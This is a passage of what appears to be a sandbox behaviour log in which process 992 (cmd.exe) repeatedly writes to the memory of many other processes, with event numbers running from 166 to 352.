PID 992 wrote to memory of 1136	992	cmd.exe	166
PID 992 wrote to memory of 1136	992	cmd.exe	166
PID 992 wrote to memory of 1088	992	cmd.exe	167
PID 992 wrote to memory of 1088	992	cmd.exe	167
PID 992 wrote to memory of 1088	992	cmd.exe	167
PID 992 wrote to memory of 1972	992	cmd.exe	168
PID 992 wrote to memory of 1972	992	cmd.exe	168
PID 992 wrote to memory of 1972	992	cmd.exe	168
PID 992 wrote to memory of 1788	992	cmd.exe	169
PID 992 wrote to memory of 1788	992	cmd.exe	169
PID 992 wrote to memory of 1788	992	cmd.exe	169
PID 992 wrote to memory of 1988	992	cmd.exe	170
PID 992 wrote to memory of 1988	992	cmd.exe	170
PID 992 wrote to memory of 1988	992	cmd.exe	170
PID 992 wrote to memory of 2004	992	cmd.exe	171
PID 992 wrote to memory of 2004	992	cmd.exe	171
PID 992 wrote to memory of 2004	992	cmd.exe	171
PID 992 wrote to memory of 1220	992	cmd.exe	172
PID 992 wrote to memory of 1220	992	cmd.exe	172
PID 992 wrote to memory of 1220	992	cmd.exe	172
PID 992 wrote to memory of 1060	992	cmd.exe	173
PID 992 wrote to memory of 1060	992	cmd.exe	173
PID 992 wrote to memory of 1060	992	cmd.exe	173
PID 992 wrote to memory of 1840	992	cmd.exe	174
PID 992 wrote to memory of 1840	992	cmd.exe	174
PID 992 wrote to memory of 1840	992	cmd.exe	174
PID 992 wrote to memory of 624	992	cmd.exe	175
PID 992 wrote to memory of 624	992	cmd.exe	175
PID 992 wrote to memory of 624	992	cmd.exe	175
PID 992 wrote to memory of 1040	992	cmd.exe	176
PID 992 wrote to memory of 1040	992	cmd.exe	176
PID 992 wrote to memory of 1040	992	cmd.exe	176
PID 992 wrote to memory of 1688	992	cmd.exe	177
PID 992 wrote to memory of 1688	992	cmd.exe	177
PID 992 wrote to memory of 1688	992	cmd.exe	177
PID 992 wrote to memory of 328	992	cmd.exe	178
PID 992 wrote to memory of 328	992	cmd.exe	178
PID 992 wrote to memory of 328	992	cmd.exe	178
PID 992 wrote to memory of 2032	992	cmd.exe	179
PID 992 wrote to memory of 2032	992	cmd.exe	179
PID 992 wrote to memory of 2032	992	cmd.exe	179
PID 992 wrote to memory of 1152	992	cmd.exe	180
PID 992 wrote to memory of 1152	992	cmd.exe	180
PID 992 wrote to memory of 1152	992	cmd.exe	180
PID 992 wrote to memory of 1880	992	cmd.exe	181
PID 992 wrote to memory of 1880	992	cmd.exe	181
PID 992 wrote to memory of 1880	992	cmd.exe	181
PID 992 wrote to memory of 972	992	cmd.exe	182
PID 992 wrote to memory of 972	992	cmd.exe	182
PID 992 wrote to memory of 972	992	cmd.exe	182
PID 992 wrote to memory of 1272	992	cmd.exe	183
PID 992 wrote to memory of 1272	992	cmd.exe	183
PID 992 wrote to memory of 1272	992	cmd.exe	183
PID 992 wrote to memory of 1076	992	cmd.exe	184
PID 992 wrote to memory of 1076	992	cmd.exe	184
PID 992 wrote to memory of 1076	992	cmd.exe	184
PID 992 wrote to memory of 1232	992	cmd.exe	185
PID 992 wrote to memory of 1232	992	cmd.exe	185
PID 992 wrote to memory of 1232	992	cmd.exe	185
PID 992 wrote to memory of 316	992	cmd.exe	186
PID 992 wrote to memory of 316	992	cmd.exe	186
PID 992 wrote to memory of 316	992	cmd.exe	186
PID 992 wrote to memory of 1608	992	cmd.exe	187
PID 992 wrote to memory of 1608	992	cmd.exe	187
PID 992 wrote to memory of 1608	992	cmd.exe	187
PID 992 wrote to memory of 2044	992	cmd.exe	188
PID 992 wrote to memory of 2044	992	cmd.exe	188
PID 992 wrote to memory of 2044	992	cmd.exe	188
PID 992 wrote to memory of 1512	992	cmd.exe	189
PID 992 wrote to memory of 1512	992	cmd.exe	189
PID 992 wrote to memory of 1512	992	cmd.exe	189
PID 992 wrote to memory of 1564	992	cmd.exe	190
PID 992 wrote to memory of 1564	992	cmd.exe	190
PID 992 wrote to memory of 1564	992	cmd.exe	190
PID 992 wrote to memory of 1400	992	cmd.exe	191
PID 992 wrote to memory of 1400	992	cmd.exe	191
PID 992 wrote to memory of 1400	992	cmd.exe	191
PID 992 wrote to memory of 1944	992	cmd.exe	192
PID 992 wrote to memory of 1944	992	cmd.exe	192
PID 992 wrote to memory of 1944	992	cmd.exe	192
PID 992 wrote to memory of 1960	992	cmd.exe	193
PID 992 wrote to memory of 1960	992	cmd.exe	193
PID 992 wrote to memory of 1960	992	cmd.exe	193
PID 992 wrote to memory of 1968	992	cmd.exe	194
PID 992 wrote to memory of 1968	992	cmd.exe	194
PID 992 wrote to memory of 1968	992	cmd.exe	194
PID 992 wrote to memory of 1136	992	cmd.exe	195
PID 992 wrote to memory of 1136	992	cmd.exe	195
PID 992 wrote to memory of 1136	992	cmd.exe	195
PID 992 wrote to memory of 1088	992	cmd.exe	196
PID 992 wrote to memory of 1088	992	cmd.exe	196
PID 992 wrote to memory of 1088	992	cmd.exe	196
PID 992 wrote to memory of 1972	992	cmd.exe	197
PID 992 wrote to memory of 1972	992	cmd.exe	197
PID 992 wrote to memory of 1972	992	cmd.exe	197
PID 992 wrote to memory of 1788	992	cmd.exe	198
PID 992 wrote to memory of 1788	992	cmd.exe	198
PID 992 wrote to memory of 1788	992	cmd.exe	198
PID 992 wrote to memory of 1988	992	cmd.exe	199
PID 992 wrote to memory of 1988	992	cmd.exe	199
PID 992 wrote to memory of 1988	992	cmd.exe	199
PID 992 wrote to memory of 2004	992	cmd.exe	200
PID 992 wrote to memory of 2004	992	cmd.exe	200
PID 992 wrote to memory of 2004	992	cmd.exe	200
PID 992 wrote to memory of 1220	992	cmd.exe	201
PID 992 wrote to memory of 1220	992	cmd.exe	201
PID 992 wrote to memory of 1220	992	cmd.exe	201
PID 992 wrote to memory of 1060	992	cmd.exe	202
PID 992 wrote to memory of 1060	992	cmd.exe	202
PID 992 wrote to memory of 1060	992	cmd.exe	202
PID 992 wrote to memory of 1840	992	cmd.exe	203
PID 992 wrote to memory of 1840	992	cmd.exe	203
PID 992 wrote to memory of 1840	992	cmd.exe	203
PID 992 wrote to memory of 624	992	cmd.exe	204
PID 992 wrote to memory of 624	992	cmd.exe	204
PID 992 wrote to memory of 624	992	cmd.exe	204
PID 992 wrote to memory of 1040	992	cmd.exe	205
PID 992 wrote to memory of 1040	992	cmd.exe	205
PID 992 wrote to memory of 1040	992	cmd.exe	205
PID 992 wrote to memory of 1688	992	cmd.exe	206
PID 992 wrote to memory of 1688	992	cmd.exe	206
PID 992 wrote to memory of 1688	992	cmd.exe	206
PID 992 wrote to memory of 328	992	cmd.exe	207
PID 992 wrote to memory of 328	992	cmd.exe	207
PID 992 wrote to memory of 328	992	cmd.exe	207
PID 992 wrote to memory of 2032	992	cmd.exe	208
PID 992 wrote to memory of 2032	992	cmd.exe	208
PID 992 wrote to memory of 2032	992	cmd.exe	208
PID 992 wrote to memory of 1152	992	cmd.exe	209
PID 992 wrote to memory of 1152	992	cmd.exe	209
PID 992 wrote to memory of 1152	992	cmd.exe	209
PID 992 wrote to memory of 1880	992	cmd.exe	210
PID 992 wrote to memory of 1880	992	cmd.exe	210
PID 992 wrote to memory of 1880	992	cmd.exe	210
PID 992 wrote to memory of 972	992	cmd.exe	211
PID 992 wrote to memory of 972	992	cmd.exe	211
PID 992 wrote to memory of 972	992	cmd.exe	211
PID 992 wrote to memory of 1272	992	cmd.exe	212
PID 992 wrote to memory of 1272	992	cmd.exe	212
PID 992 wrote to memory of 1272	992	cmd.exe	212
PID 992 wrote to memory of 1076	992	cmd.exe	213
PID 992 wrote to memory of 1076	992	cmd.exe	213
PID 992 wrote to memory of 1076	992	cmd.exe	213
PID 992 wrote to memory of 1232	992	cmd.exe	214
PID 992 wrote to memory of 1232	992	cmd.exe	214
PID 992 wrote to memory of 1232	992	cmd.exe	214
PID 992 wrote to memory of 316	992	cmd.exe	215
PID 992 wrote to memory of 316	992	cmd.exe	215
PID 992 wrote to memory of 316	992	cmd.exe	215
PID 992 wrote to memory of 1608	992	cmd.exe	216
PID 992 wrote to memory of 1608	992	cmd.exe	216
PID 992 wrote to memory of 1608	992	cmd.exe	216
PID 992 wrote to memory of 2044	992	cmd.exe	217
PID 992 wrote to memory of 2044	992	cmd.exe	217
PID 992 wrote to memory of 2044	992	cmd.exe	217
PID 992 wrote to memory of 1512	992	cmd.exe	218
PID 992 wrote to memory of 1512	992	cmd.exe	218
PID 992 wrote to memory of 1512	992	cmd.exe	218
PID 992 wrote to memory of 1564	992	cmd.exe	219
PID 992 wrote to memory of 1564	992	cmd.exe	219
PID 992 wrote to memory of 1564	992	cmd.exe	219
PID 992 wrote to memory of 1400	992	cmd.exe	220
PID 992 wrote to memory of 1400	992	cmd.exe	220
PID 992 wrote to memory of 1400	992	cmd.exe	220
PID 992 wrote to memory of 1944	992	cmd.exe	221
PID 992 wrote to memory of 1944	992	cmd.exe	221
PID 992 wrote to memory of 1944	992	cmd.exe	221
PID 992 wrote to memory of 1960	992	cmd.exe	222
PID 992 wrote to memory of 1960	992	cmd.exe	222
PID 992 wrote to memory of 1960	992	cmd.exe	222
PID 992 wrote to memory of 1968	992	cmd.exe	223
PID 992 wrote to memory of 1968	992	cmd.exe	223
PID 992 wrote to memory of 1968	992	cmd.exe	223
PID 992 wrote to memory of 1136	992	cmd.exe	224
PID 992 wrote to memory of 1136	992	cmd.exe	224
PID 992 wrote to memory of 1136	992	cmd.exe	224
PID 992 wrote to memory of 1088	992	cmd.exe	225
PID 992 wrote to memory of 1088	992	cmd.exe	225
PID 992 wrote to memory of 1088	992	cmd.exe	225
PID 992 wrote to memory of 1972	992	cmd.exe	226
PID 992 wrote to memory of 1972	992	cmd.exe	226
PID 992 wrote to memory of 1972	992	cmd.exe	226
PID 992 wrote to memory of 1788	992	cmd.exe	227
PID 992 wrote to memory of 1788	992	cmd.exe	227
PID 992 wrote to memory of 1788	992	cmd.exe	227
PID 992 wrote to memory of 1988	992	cmd.exe	228
PID 992 wrote to memory of 1988	992	cmd.exe	228
PID 992 wrote to memory of 1988	992	cmd.exe	228
PID 992 wrote to memory of 2004	992	cmd.exe	229
PID 992 wrote to memory of 2004	992	cmd.exe	229
PID 992 wrote to memory of 2004	992	cmd.exe	229
PID 992 wrote to memory of 1220	992	cmd.exe	230
PID 992 wrote to memory of 1220	992	cmd.exe	230
PID 992 wrote to memory of 1220	992	cmd.exe	230
PID 992 wrote to memory of 1060	992	cmd.exe	231
PID 992 wrote to memory of 1060	992	cmd.exe	231
PID 992 wrote to memory of 1060	992	cmd.exe	231
PID 992 wrote to memory of 1840	992	cmd.exe	232
PID 992 wrote to memory of 1840	992	cmd.exe	232
PID 992 wrote to memory of 1840	992	cmd.exe	232
PID 992 wrote to memory of 624	992	cmd.exe	233
PID 992 wrote to memory of 624	992	cmd.exe	233
PID 992 wrote to memory of 624	992	cmd.exe	233
PID 992 wrote to memory of 1040	992	cmd.exe	234
PID 992 wrote to memory of 1040	992	cmd.exe	234
PID 992 wrote to memory of 1040	992	cmd.exe	234
PID 992 wrote to memory of 1688	992	cmd.exe	235
PID 992 wrote to memory of 1688	992	cmd.exe	235
PID 992 wrote to memory of 1688	992	cmd.exe	235
PID 992 wrote to memory of 328	992	cmd.exe	236
PID 992 wrote to memory of 328	992	cmd.exe	236
PID 992 wrote to memory of 328	992	cmd.exe	236
PID 992 wrote to memory of 2032	992	cmd.exe	237
PID 992 wrote to memory of 2032	992	cmd.exe	237
PID 992 wrote to memory of 2032	992	cmd.exe	237
PID 992 wrote to memory of 1152	992	cmd.exe	238
PID 992 wrote to memory of 1152	992	cmd.exe	238
PID 992 wrote to memory of 1152	992	cmd.exe	238
PID 992 wrote to memory of 1880	992	cmd.exe	239
PID 992 wrote to memory of 1880	992	cmd.exe	239
PID 992 wrote to memory of 1880	992	cmd.exe	239
PID 992 wrote to memory of 972	992	cmd.exe	240
PID 992 wrote to memory of 972	992	cmd.exe	240
PID 992 wrote to memory of 972	992	cmd.exe	240
PID 992 wrote to memory of 1272	992	cmd.exe	241
PID 992 wrote to memory of 1272	992	cmd.exe	241
PID 992 wrote to memory of 1272	992	cmd.exe	241
PID 992 wrote to memory of 1076	992	cmd.exe	242
PID 992 wrote to memory of 1076	992	cmd.exe	242
PID 992 wrote to memory of 1076	992	cmd.exe	242
PID 992 wrote to memory of 1232	992	cmd.exe	243
PID 992 wrote to memory of 1232	992	cmd.exe	243
PID 992 wrote to memory of 1232	992	cmd.exe	243
PID 992 wrote to memory of 316	992	cmd.exe	244
PID 992 wrote to memory of 316	992	cmd.exe	244
PID 992 wrote to memory of 316	992	cmd.exe	244
PID 992 wrote to memory of 1608	992	cmd.exe	245
PID 992 wrote to memory of 1608	992	cmd.exe	245
PID 992 wrote to memory of 1608	992	cmd.exe	245
PID 992 wrote to memory of 2044	992	cmd.exe	246
PID 992 wrote to memory of 2044	992	cmd.exe	246
PID 992 wrote to memory of 2044	992	cmd.exe	246
PID 992 wrote to memory of 1512	992	cmd.exe	247
PID 992 wrote to memory of 1512	992	cmd.exe	247
PID 992 wrote to memory of 1512	992	cmd.exe	247
PID 992 wrote to memory of 1564	992	cmd.exe	248
PID 992 wrote to memory of 1564	992	cmd.exe	248
PID 992 wrote to memory of 1564	992	cmd.exe	248
PID 992 wrote to memory of 1400	992	cmd.exe	249
PID 992 wrote to memory of 1400	992	cmd.exe	249
PID 992 wrote to memory of 1400	992	cmd.exe	249
PID 992 wrote to memory of 1944	992	cmd.exe	250
PID 992 wrote to memory of 1944	992	cmd.exe	250
PID 992 wrote to memory of 1944	992	cmd.exe	250
PID 992 wrote to memory of 1960	992	cmd.exe	251
PID 992 wrote to memory of 1960	992	cmd.exe	251
PID 992 wrote to memory of 1960	992	cmd.exe	251
PID 992 wrote to memory of 1968	992	cmd.exe	252
PID 992 wrote to memory of 1968	992	cmd.exe	252
PID 992 wrote to memory of 1968	992	cmd.exe	252
PID 992 wrote to memory of 1136	992	cmd.exe	253
PID 992 wrote to memory of 1136	992	cmd.exe	253
PID 992 wrote to memory of 1136	992	cmd.exe	253
PID 992 wrote to memory of 1088	992	cmd.exe	254
PID 992 wrote to memory of 1088	992	cmd.exe	254
PID 992 wrote to memory of 1088	992	cmd.exe	254
PID 992 wrote to memory of 1972	992	cmd.exe	255
PID 992 wrote to memory of 1972	992	cmd.exe	255
PID 992 wrote to memory of 1972	992	cmd.exe	255
PID 992 wrote to memory of 1788	992	cmd.exe	256
PID 992 wrote to memory of 1788	992	cmd.exe	256
PID 992 wrote to memory of 1788	992	cmd.exe	256
PID 992 wrote to memory of 1988	992	cmd.exe	257
PID 992 wrote to memory of 1988	992	cmd.exe	257
PID 992 wrote to memory of 1988	992	cmd.exe	257
PID 992 wrote to memory of 2004	992	cmd.exe	258
PID 992 wrote to memory of 2004	992	cmd.exe	258
PID 992 wrote to memory of 2004	992	cmd.exe	258
PID 992 wrote to memory of 1220	992	cmd.exe	259
PID 992 wrote to memory of 1220	992	cmd.exe	259
PID 992 wrote to memory of 1220	992	cmd.exe	259
PID 992 wrote to memory of 1060	992	cmd.exe	260
PID 992 wrote to memory of 1060	992	cmd.exe	260
PID 992 wrote to memory of 1060	992	cmd.exe	260
PID 992 wrote to memory of 1840	992	cmd.exe	261
PID 992 wrote to memory of 1840	992	cmd.exe	261
PID 992 wrote to memory of 1840	992	cmd.exe	261
PID 992 wrote to memory of 624	992	cmd.exe	262
PID 992 wrote to memory of 624	992	cmd.exe	262
PID 992 wrote to memory of 624	992	cmd.exe	262
PID 992 wrote to memory of 1040	992	cmd.exe	263
PID 992 wrote to memory of 1040	992	cmd.exe	263
PID 992 wrote to memory of 1040	992	cmd.exe	263
PID 992 wrote to memory of 1688	992	cmd.exe	264
PID 992 wrote to memory of 1688	992	cmd.exe	264
PID 992 wrote to memory of 1688	992	cmd.exe	264
PID 992 wrote to memory of 328	992	cmd.exe	265
PID 992 wrote to memory of 328	992	cmd.exe	265
PID 992 wrote to memory of 328	992	cmd.exe	265
PID 992 wrote to memory of 2032	992	cmd.exe	266
PID 992 wrote to memory of 2032	992	cmd.exe	266
PID 992 wrote to memory of 2032	992	cmd.exe	266
PID 992 wrote to memory of 1152	992	cmd.exe	267
PID 992 wrote to memory of 1152	992	cmd.exe	267
PID 992 wrote to memory of 1152	992	cmd.exe	267
PID 992 wrote to memory of 1880	992	cmd.exe	268
PID 992 wrote to memory of 1880	992	cmd.exe	268
PID 992 wrote to memory of 1880	992	cmd.exe	268
PID 992 wrote to memory of 972	992	cmd.exe	269
PID 992 wrote to memory of 972	992	cmd.exe	269
PID 992 wrote to memory of 972	992	cmd.exe	269
PID 992 wrote to memory of 1272	992	cmd.exe	270
PID 992 wrote to memory of 1272	992	cmd.exe	270
PID 992 wrote to memory of 1272	992	cmd.exe	270
PID 992 wrote to memory of 1076	992	cmd.exe	271
PID 992 wrote to memory of 1076	992	cmd.exe	271
PID 992 wrote to memory of 1076	992	cmd.exe	271
PID 992 wrote to memory of 1232	992	cmd.exe	272
PID 992 wrote to memory of 1232	992	cmd.exe	272
PID 992 wrote to memory of 1232	992	cmd.exe	272
PID 992 wrote to memory of 316	992	cmd.exe	273
PID 992 wrote to memory of 316	992	cmd.exe	273
PID 992 wrote to memory of 316	992	cmd.exe	273
PID 992 wrote to memory of 1608	992	cmd.exe	274
PID 992 wrote to memory of 1608	992	cmd.exe	274
PID 992 wrote to memory of 1608	992	cmd.exe	274
PID 992 wrote to memory of 2044	992	cmd.exe	275
PID 992 wrote to memory of 2044	992	cmd.exe	275
PID 992 wrote to memory of 2044	992	cmd.exe	275
PID 992 wrote to memory of 1512	992	cmd.exe	276
PID 992 wrote to memory of 1512	992	cmd.exe	276
PID 992 wrote to memory of 1512	992	cmd.exe	276
PID 992 wrote to memory of 1564	992	cmd.exe	277
PID 992 wrote to memory of 1564	992	cmd.exe	277
PID 992 wrote to memory of 1564	992	cmd.exe	277
PID 992 wrote to memory of 1400	992	cmd.exe	278
PID 992 wrote to memory of 1400	992	cmd.exe	278
PID 992 wrote to memory of 1400	992	cmd.exe	278
PID 992 wrote to memory of 1944	992	cmd.exe	279
PID 992 wrote to memory of 1944	992	cmd.exe	279
PID 992 wrote to memory of 1944	992	cmd.exe	279
PID 992 wrote to memory of 1960	992	cmd.exe	280
PID 992 wrote to memory of 1960	992	cmd.exe	280
PID 992 wrote to memory of 1960	992	cmd.exe	280
PID 992 wrote to memory of 1968	992	cmd.exe	281
PID 992 wrote to memory of 1968	992	cmd.exe	281
PID 992 wrote to memory of 1968	992	cmd.exe	281
PID 992 wrote to memory of 1136	992	cmd.exe	282
PID 992 wrote to memory of 1136	992	cmd.exe	282
PID 992 wrote to memory of 1136	992	cmd.exe	282
PID 992 wrote to memory of 1088	992	cmd.exe	283
PID 992 wrote to memory of 1088	992	cmd.exe	283
PID 992 wrote to memory of 1088	992	cmd.exe	283
PID 992 wrote to memory of 1972	992	cmd.exe	284
PID 992 wrote to memory of 1972	992	cmd.exe	284
PID 992 wrote to memory of 1972	992	cmd.exe	284
PID 992 wrote to memory of 1788	992	cmd.exe	285
PID 992 wrote to memory of 1788	992	cmd.exe	285
PID 992 wrote to memory of 1788	992	cmd.exe	285
PID 992 wrote to memory of 1988	992	cmd.exe	286
PID 992 wrote to memory of 1988	992	cmd.exe	286
PID 992 wrote to memory of 1988	992	cmd.exe	286
PID 992 wrote to memory of 2004	992	cmd.exe	287
PID 992 wrote to memory of 2004	992	cmd.exe	287
PID 992 wrote to memory of 2004	992	cmd.exe	287
PID 992 wrote to memory of 388	992	cmd.exe	288
PID 992 wrote to memory of 388	992	cmd.exe	288
PID 992 wrote to memory of 388	992	cmd.exe	288
PID 992 wrote to memory of 740	992	cmd.exe	289
PID 992 wrote to memory of 740	992	cmd.exe	289
PID 992 wrote to memory of 740	992	cmd.exe	289
PID 992 wrote to memory of 1028	992	cmd.exe	290
PID 992 wrote to memory of 1028	992	cmd.exe	290
PID 992 wrote to memory of 1028	992	cmd.exe	290
PID 992 wrote to memory of 1340	992	cmd.exe	291
PID 992 wrote to memory of 1340	992	cmd.exe	291
PID 992 wrote to memory of 1340	992	cmd.exe	291
PID 992 wrote to memory of 1080	992	cmd.exe	292
PID 992 wrote to memory of 1080	992	cmd.exe	292
PID 992 wrote to memory of 1080	992	cmd.exe	292
PID 992 wrote to memory of 1872	992	cmd.exe	293
PID 992 wrote to memory of 1872	992	cmd.exe	293
PID 992 wrote to memory of 1872	992	cmd.exe	293
PID 992 wrote to memory of 300	992	cmd.exe	294
PID 992 wrote to memory of 300	992	cmd.exe	294
PID 992 wrote to memory of 300	992	cmd.exe	294
PID 992 wrote to memory of 2036	992	cmd.exe	295
PID 992 wrote to memory of 2036	992	cmd.exe	295
PID 992 wrote to memory of 2036	992	cmd.exe	295
PID 992 wrote to memory of 1520	992	cmd.exe	296
PID 992 wrote to memory of 1520	992	cmd.exe	296
PID 992 wrote to memory of 1520	992	cmd.exe	296
PID 992 wrote to memory of 1560	992	cmd.exe	297
PID 992 wrote to memory of 1560	992	cmd.exe	297
PID 992 wrote to memory of 1560	992	cmd.exe	297
PID 992 wrote to memory of 1532	992	cmd.exe	298
PID 992 wrote to memory of 1532	992	cmd.exe	298
PID 992 wrote to memory of 1532	992	cmd.exe	298
PID 992 wrote to memory of 884	992	cmd.exe	299
PID 992 wrote to memory of 884	992	cmd.exe	299
PID 992 wrote to memory of 884	992	cmd.exe	299
PID 992 wrote to memory of 1992	992	cmd.exe	300
PID 992 wrote to memory of 1992	992	cmd.exe	300
PID 992 wrote to memory of 1992	992	cmd.exe	300
PID 992 wrote to memory of 1996	992	cmd.exe	301
PID 992 wrote to memory of 1996	992	cmd.exe	301
PID 992 wrote to memory of 1996	992	cmd.exe	301
PID 992 wrote to memory of 1112	992	cmd.exe	302
PID 992 wrote to memory of 1112	992	cmd.exe	302
PID 992 wrote to memory of 1112	992	cmd.exe	302
PID 992 wrote to memory of 1168	992	cmd.exe	303
PID 992 wrote to memory of 1168	992	cmd.exe	303
PID 992 wrote to memory of 1168	992	cmd.exe	303
PID 992 wrote to memory of 1964	992	cmd.exe	304
PID 992 wrote to memory of 1964	992	cmd.exe	304
PID 992 wrote to memory of 1964	992	cmd.exe	304
PID 992 wrote to memory of 288	992	cmd.exe	305
PID 992 wrote to memory of 288	992	cmd.exe	305
PID 992 wrote to memory of 288	992	cmd.exe	305
PID 992 wrote to memory of 864	992	cmd.exe	306
PID 992 wrote to memory of 864	992	cmd.exe	306
PID 992 wrote to memory of 864	992	cmd.exe	306
PID 992 wrote to memory of 1812	992	cmd.exe	307
PID 992 wrote to memory of 1812	992	cmd.exe	307
PID 992 wrote to memory of 1812	992	cmd.exe	307
PID 992 wrote to memory of 1792	992	cmd.exe	308
PID 992 wrote to memory of 1792	992	cmd.exe	308
PID 992 wrote to memory of 1792	992	cmd.exe	308
PID 992 wrote to memory of 1644	992	cmd.exe	309
PID 992 wrote to memory of 1644	992	cmd.exe	309
PID 992 wrote to memory of 1644	992	cmd.exe	309
PID 992 wrote to memory of 1876	992	cmd.exe	310
PID 992 wrote to memory of 1876	992	cmd.exe	310
PID 992 wrote to memory of 1876	992	cmd.exe	310
PID 992 wrote to memory of 1820	992	cmd.exe	311
PID 992 wrote to memory of 1820	992	cmd.exe	311
PID 992 wrote to memory of 1820	992	cmd.exe	311
PID 992 wrote to memory of 600	992	cmd.exe	312
PID 992 wrote to memory of 600	992	cmd.exe	312
PID 992 wrote to memory of 600	992	cmd.exe	312
PID 992 wrote to memory of 1200	992	cmd.exe	313
PID 992 wrote to memory of 1200	992	cmd.exe	313
PID 992 wrote to memory of 1200	992	cmd.exe	313
PID 992 wrote to memory of 1788	992	cmd.exe	314
PID 992 wrote to memory of 1788	992	cmd.exe	314
PID 992 wrote to memory of 1788	992	cmd.exe	314
PID 992 wrote to memory of 1408	992	cmd.exe	315
PID 992 wrote to memory of 1408	992	cmd.exe	315
PID 992 wrote to memory of 1408	992	cmd.exe	315
PID 992 wrote to memory of 564	992	cmd.exe	316
PID 992 wrote to memory of 564	992	cmd.exe	316
PID 992 wrote to memory of 564	992	cmd.exe	316
PID 992 wrote to memory of 1060	992	cmd.exe	317
PID 992 wrote to memory of 1060	992	cmd.exe	317
PID 992 wrote to memory of 1060	992	cmd.exe	317
PID 992 wrote to memory of 1840	992	cmd.exe	318
PID 992 wrote to memory of 1840	992	cmd.exe	318
PID 992 wrote to memory of 1840	992	cmd.exe	318
PID 992 wrote to memory of 624	992	cmd.exe	319
PID 992 wrote to memory of 624	992	cmd.exe	319
PID 992 wrote to memory of 624	992	cmd.exe	319
PID 992 wrote to memory of 1040	992	cmd.exe	320
PID 992 wrote to memory of 1040	992	cmd.exe	320
PID 992 wrote to memory of 1040	992	cmd.exe	320
PID 992 wrote to memory of 1688	992	cmd.exe	321
PID 992 wrote to memory of 1688	992	cmd.exe	321
PID 992 wrote to memory of 1688	992	cmd.exe	321
PID 992 wrote to memory of 328	992	cmd.exe	322
PID 992 wrote to memory of 328	992	cmd.exe	322
PID 992 wrote to memory of 328	992	cmd.exe	322
PID 992 wrote to memory of 2032	992	cmd.exe	323
PID 992 wrote to memory of 2032	992	cmd.exe	323
PID 992 wrote to memory of 2032	992	cmd.exe	323
PID 992 wrote to memory of 1152	992	cmd.exe	324
PID 992 wrote to memory of 1152	992	cmd.exe	324
PID 992 wrote to memory of 1152	992	cmd.exe	324
PID 992 wrote to memory of 1880	992	cmd.exe	325
PID 992 wrote to memory of 1880	992	cmd.exe	325
PID 992 wrote to memory of 1880	992	cmd.exe	325
PID 992 wrote to memory of 972	992	cmd.exe	326
PID 992 wrote to memory of 972	992	cmd.exe	326
PID 992 wrote to memory of 972	992	cmd.exe	326
PID 992 wrote to memory of 1272	992	cmd.exe	327
PID 992 wrote to memory of 1272	992	cmd.exe	327
PID 992 wrote to memory of 1272	992	cmd.exe	327
PID 992 wrote to memory of 1076	992	cmd.exe	328
PID 992 wrote to memory of 1076	992	cmd.exe	328
PID 992 wrote to memory of 1076	992	cmd.exe	328
PID 992 wrote to memory of 1232	992	cmd.exe	329
PID 992 wrote to memory of 1232	992	cmd.exe	329
PID 992 wrote to memory of 1232	992	cmd.exe	329
PID 992 wrote to memory of 316	992	cmd.exe	330
PID 992 wrote to memory of 316	992	cmd.exe	330
PID 992 wrote to memory of 316	992	cmd.exe	330
PID 992 wrote to memory of 1608	992	cmd.exe	331
PID 992 wrote to memory of 1608	992	cmd.exe	331
PID 992 wrote to memory of 1608	992	cmd.exe	331
PID 992 wrote to memory of 2044	992	cmd.exe	332
PID 992 wrote to memory of 2044	992	cmd.exe	332
PID 992 wrote to memory of 2044	992	cmd.exe	332
PID 992 wrote to memory of 1512	992	cmd.exe	333
PID 992 wrote to memory of 1512	992	cmd.exe	333
PID 992 wrote to memory of 1512	992	cmd.exe	333
PID 992 wrote to memory of 1564	992	cmd.exe	334
PID 992 wrote to memory of 1564	992	cmd.exe	334
PID 992 wrote to memory of 1564	992	cmd.exe	334
PID 992 wrote to memory of 1400	992	cmd.exe	335
PID 992 wrote to memory of 1400	992	cmd.exe	335
PID 992 wrote to memory of 1400	992	cmd.exe	335
PID 992 wrote to memory of 1944	992	cmd.exe	336
PID 992 wrote to memory of 1944	992	cmd.exe	336
PID 992 wrote to memory of 1944	992	cmd.exe	336
PID 992 wrote to memory of 1960	992	cmd.exe	337
PID 992 wrote to memory of 1960	992	cmd.exe	337
PID 992 wrote to memory of 1960	992	cmd.exe	337
PID 992 wrote to memory of 1968	992	cmd.exe	338
PID 992 wrote to memory of 1968	992	cmd.exe	338
PID 992 wrote to memory of 1968	992	cmd.exe	338
PID 992 wrote to memory of 1136	992	cmd.exe	339
PID 992 wrote to memory of 1136	992	cmd.exe	339
PID 992 wrote to memory of 1136	992	cmd.exe	339
PID 992 wrote to memory of 1088	992	cmd.exe	340
PID 992 wrote to memory of 1088	992	cmd.exe	340
PID 992 wrote to memory of 1088	992	cmd.exe	340
PID 992 wrote to memory of 1972	992	cmd.exe	341
PID 992 wrote to memory of 1972	992	cmd.exe	341
PID 992 wrote to memory of 1972	992	cmd.exe	341
PID 992 wrote to memory of 688	992	cmd.exe	342
PID 992 wrote to memory of 688	992	cmd.exe	342
PID 992 wrote to memory of 688	992	cmd.exe	342
PID 992 wrote to memory of 920	992	cmd.exe	343
PID 992 wrote to memory of 920	992	cmd.exe	343
PID 992 wrote to memory of 920	992	cmd.exe	343
PID 992 wrote to memory of 1468	992	cmd.exe	344
PID 992 wrote to memory of 1468	992	cmd.exe	344
PID 992 wrote to memory of 1468	992	cmd.exe	344
PID 992 wrote to memory of 1212	992	cmd.exe	345
PID 992 wrote to memory of 1212	992	cmd.exe	345
PID 992 wrote to memory of 1212	992	cmd.exe	345
PID 992 wrote to memory of 1656	992	cmd.exe	346
PID 992 wrote to memory of 1656	992	cmd.exe	346
PID 992 wrote to memory of 1656	992	cmd.exe	346
PID 992 wrote to memory of 1176	992	cmd.exe	347
PID 992 wrote to memory of 1176	992	cmd.exe	347
PID 992 wrote to memory of 1176	992	cmd.exe	347
PID 992 wrote to memory of 1356	992	cmd.exe	348
PID 992 wrote to memory of 1356	992	cmd.exe	348
PID 992 wrote to memory of 1356	992	cmd.exe	348
PID 992 wrote to memory of 1032	992	cmd.exe	349
PID 992 wrote to memory of 1032	992	cmd.exe	349
PID 992 wrote to memory of 1032	992	cmd.exe	349
PID 992 wrote to memory of 660	992	cmd.exe	350
PID 992 wrote to memory of 660	992	cmd.exe	350
PID 992 wrote to memory of 660	992	cmd.exe	350
PID 992 wrote to memory of 1484	992	cmd.exe	351
PID 992 wrote to memory of 1484	992	cmd.exe	351
PID 992 wrote to memory of 1484	992	cmd.exe	351
PID 992 wrote to memory of 2012	992	cmd.exe	352
PID 992 wrote to memory of 2012	992	cmd.exe	352
